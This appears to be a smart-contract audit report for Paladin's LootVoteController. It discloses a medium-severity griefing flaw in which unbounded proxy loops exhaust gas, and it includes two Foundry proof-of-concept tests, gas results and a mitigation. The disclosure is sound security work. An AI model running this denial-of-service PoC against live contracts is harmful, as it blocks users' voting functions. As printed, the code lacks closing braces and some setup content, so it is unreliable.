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252 lines (177 loc) · 8.21 KB


The github issue page can be found in here.

Findings Summary

ID Description Severity
M-01 Unbounded proxy length in LootVoteController can cause function to become unusable. Medium

[M-01] Unbounded proxy length in LootVoteController can cause function to become unusable.

Bug Description

The proxy length in LootVoteController.sol is unbounded, and the length of proxy is looped in LootVoteController::_clearExpiredProxies. Each time the function LootVoteController::setVoterProxy is called, a new proxy will be added to the currentUserProxyVoters array. If at some point there are now a large number of proxies, iterating over them will become very costly and can result in a gas cost that is over the block gas limit. This will mean that a transaction cannot be executed anymore, causing these functions in a state of DoS.

Attack Scenario

Looping over unbounded array can result in a state of DoS.

Proof Of Concept

  • Install foundry.

  • Rename the original test folder to typescript-test and create a new folder name test.

  • Add forge-std module to lib with command: git submodule add lib/forge-std

  • Add remappings.txt file in Vote-Flywheel folder with the following content:

  • AddLootVoteController.t.sol file within the test folder with the following content:
pragma solidity 0.8.20;

import {LootVoteController} from "../LootVoteController.sol";
import {Test, console} from "forge-std/Test.sol";
import {HolyPalPower} from "../HolyPalPower.sol";
contract HolyPaladinToken {
    	struct UserLock {
        // Amount of locked balance
        uint128 amount; // safe because PAL max supply is 10M tokens
        // Start of the Lock
        uint48 startTimestamp;
        // Duration of the Lock
        uint48 duration;
        // BlockNumber for the Lock
        uint32 fromBlock; // because we want to search by block number

    struct TotalLock {
        // Total locked Supply
        uint224 total;
        // BlockNumber for the last update
        uint32 fromBlock;

    function getUserLock(address user) external view returns (UserLock memory) {
        return UserLock(1,1708151785,604800, 19245756); // DUMMY VALUE AS THIS IS FOR TESTING PURPOSE ONLY.


contract LootVoteControllerTest is Test {

    LootVoteController public controller;
    address public user;
    address public malicious_manager;
    address public benign_manager;
    HolyPalPower public _hPalPower;
    HolyPaladinToken public hPal;

    function setUp() public {
        hPal = new HolyPaladinToken();
        _hPalPower = new HolyPalPower(address(hPal)); 
        user = makeAddr("USER"); // Dummy user for testing.
        malicious_manager = makeAddr("MALICIOUS_MANAGER");
        benign_manager = makeAddr("BENIGN_MANAGER"); 
        controller = new LootVoteController(address(_hPalPower));

    function test_DOSinSetVoterProxy() public {

        uint256 WEEK = 604800;

        for (uint i; i <= 5000; i++ ) {
            controller.setVoterProxy(user, address(uint160(i + 1)), 1, block.timestamp + WEEK);


        uint gasBefore = gasleft();

        controller.setVoterProxy(user,address(0x666),1,block.timestamp + WEEK);
        uint gasAfter = gasleft();

        console.log("Gas Used for calling setVoterProxy: ", gasBefore - gasAfter);
  • Run the test with command : forge test --match-test test_DOSinSetVoterProxy -vv:

Foundry Result:

Running 1 test for contracts/test/LootVoteController.t.sol:LootVoteControllerTest
[PASS] test_DOSinSetVoterProxy() (gas: 8775765976)
  Gas Used for calling setVoterProxy:  3451669

Test result: ok. 1 passed; 0 failed; 0 skipped; finished in 74.51s
Ran 1 test suites: 1 tests passed, 0 failed, 0 skipped (1 total tests)
mac@macs-MacBook-Pro Vote-Flywheel % 

Recommended Mitigation

Consider setting a upper bound of proxy that an approved manager can add. Additionally, consider allow users to disapprove previously approved managers in case they try to act maliciously.

Revised Proof of Concept Code

I have attached a slightly modified PoC as follows, the PoC below showcased when users delegate himself to a malicious manager, the manager can create a bunch of useless proxies that expired instantly after the startTimestamp to DoS the user from using setVoterProxy & clearUserExpiredProxies in the future as the contract trying to loop through all the expired proxies and remove them 1 by 1 which can be very gas consuming. I think this issue can also be categorised as griefing attack.

pragma solidity 0.8.20;

import {LootVoteController} from "../contracts/LootVoteController.sol";
import {Test, console} from "forge-std/Test.sol";
import {HolyPalPower} from "../contracts/HolyPalPower.sol";
contract HolyPaladinToken {
    	struct UserLock {
        // Amount of locked balance
        uint128 amount; // safe because PAL max supply is 10M tokens
        // Start of the Lock
        uint48 startTimestamp;
        // Duration of the Lock
        uint48 duration;
        // BlockNumber for the Lock
        uint32 fromBlock; // because we want to search by block number

    struct TotalLock {
        // Total locked Supply
        uint224 total;
        // BlockNumber for the last update
        uint32 fromBlock;

    function getUserLock(address user) external view returns (UserLock memory) {
        return UserLock(1,1708151785,604800, 19245756); // DUMMY VALUE AS THIS IS FOR TESTING PURPOSE ONLY.


contract LootVoteControllerTest is Test {

    LootVoteController public controller;
    address public user;
    address public malicious_manager;
    address public benign_manager;
    HolyPalPower public _hPalPower;
    HolyPaladinToken public hPal;

    function setUp() public {
        hPal = new HolyPaladinToken();
        _hPalPower = new HolyPalPower(address(hPal)); 
        user = makeAddr("USER"); // Dummy user for testing.
        malicious_manager = makeAddr("MALICIOUS_MANAGER");
        benign_manager = makeAddr("BENIGN_MANAGER"); 
        controller = new LootVoteController(address(_hPalPower));

    function test_DOSinSetVoterProxy() public {

        uint WEEK = 604800;
        uint starttimestamp = 1708151785;

        // uint256 userlocktime = ((1708151785 + 604800) / WEEK) * WEEK;
        for (uint i; i <= 1000; i++ ) {
            controller.setVoterProxy(user, address(uint160(i + 1)), 1, starttimestamp + 1);


        vm.warp(starttimestamp + 2);
        uint gasBefore = gasleft();

        controller.setVoterProxy(user,makeAddr("TEST"),1,block.timestamp + WEEK);
        uint gasAfter = gasleft();

        console.log("Gas Used for calling setVoterProxy: ", gasBefore - gasAfter);

Foundry Result:

Running 1 test for test/LootVoteController.t.sol:LootVoteControllerTest
[PASS] test_DOSinSetVoterProxy() (gas: 392493638)
  Gas Used for calling setVoterProxy:  3844080

Test result: ok. 1 passed; 0 failed; 0 skipped; finished in 3.33s
Ran 1 test suites: 1 tests passed, 0 failed, 0 skipped (1 total tests)